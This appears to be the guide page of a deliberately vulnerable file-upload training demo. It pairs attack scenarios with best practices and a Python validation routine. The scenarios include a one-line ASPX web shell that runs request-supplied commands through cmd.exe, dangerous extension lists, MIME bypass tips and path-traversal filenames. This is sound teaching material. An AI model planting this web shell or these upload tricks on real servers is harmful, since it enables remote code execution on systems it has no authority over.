File Upload Demo - Unrestricted File Upload

Unrestricted File Upload vulnerabilities occur when an application allows users to upload files without proper validation, potentially leading to remote code execution, defacement, or other attacks.

How File Upload Attacks Work:

1. Attacker uploads malicious files (PHP, ASP, JSP, executable files)
2. Server stores file without validation
3. Attacker accesses uploaded file via direct URL
4. Malicious code executes on server

Try These Attack Scenarios:

1. Web Shell Upload (if PHP/ASP supported):
   Create a file named: shell.aspx
   Content: <%@ Page Language="C#" %> <% Response.Write(System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]).StandardOutput.ReadToEnd()); %>
2. Malicious File Extensions:
   Try uploading files with these extensions:
   - .php, .php3, .php4, .php5, .phtml
   - .asp, .aspx, .jsp
   - .exe, .bat, .cmd
   - .htaccess (to override server configuration)
   - Double extensions: file.jpg.php
3. MIME Type Bypass:
   Create malicious content but with safe extensions:
   - malicious.txt (contains PHP code)
   - script.jpg (contains executable code)
   - Use tools like Burp Suite to modify the Content-Type header
4. Path Traversal in Upload:
   Try filenames with path traversal:
   - ../../../malicious.php
   - ..\\..\\..\\malicious.aspx
   - ....//....//malicious.jsp

Current Vulnerabilities in This Demo:

1. No file type validation
2. No file size limits
3. No filename sanitization
4. Files stored in web-accessible directory
5. No content scanning
6. Original filename preserved

File Upload Security Best Practices:

  • File Type Validation: Whitelist allowed file extensions and MIME types
  • File Size Limits: Implement maximum file size restrictions
  • Filename Sanitization: Remove/replace dangerous characters
  • Content Validation: Scan file contents, not just extensions
  • Storage Location: Store files outside web root or use separate domain
  • Virus Scanning: Implement antivirus scanning for uploads
  • Execute Permissions: Remove execute permissions from upload directory
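The checks below put these practices together in one validation routine. This is an added example, not code from the demo: the allowed-type table, the 2 MiB limit and the UPLOAD_DIR path are assumptions, and the declared Content-Type header is deliberately ignored because the client controls it.

```python
import os
import re
import secrets

# Allowed extensions mapped to the magic bytes a genuine file must start with.
# Assumed allow-list for this example; extend it only with types the app needs.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed 2 MiB size limit
# Hypothetical storage directory outside the web root, served (if at all)
# through a download handler rather than as static content.
UPLOAD_DIR = "/srv/app/uploads-private"


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (ok, reason) on rejection or (ok, storage_path) on success."""
    if len(data) > MAX_BYTES:
        return False, "file too large"
    # Keep only the last path component: defeats ../, ..\ and ....// tricks.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Reject dotfiles (.htaccess) and any name with more or fewer than one dot
    # (double extensions such as file.jpg.php, or no extension at all).
    if base.startswith(".") or base.count(".") != 1:
        return False, "bad filename"
    stem, ext = base.lower().rsplit(".", 1)
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", stem):
        return False, "bad filename"
    # Extension allow-list; a deny-list of .php/.aspx/.jsp is always incomplete.
    if ext not in ALLOWED:
        return False, "extension not allowed"
    # Content must match the claimed type, so script.jpg holding code fails here.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    # Never keep the original name: random name plus the validated extension.
    storage_name = f"{secrets.token_hex(16)}.{ext}"
    return True, os.path.join(UPLOAD_DIR, storage_name)
```

The stored file should additionally be written with no execute bit and the upload directory served without script handlers, which are deployment settings this function cannot enforce on its own.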

Test Steps:

1. Try uploading different file types (.txt, .php, .exe, etc.)
2. Upload files with dangerous filenames
3. Check if uploaded files are accessible directly
4. Try uploading files with malicious content
5. Test file size limits (try very large files)
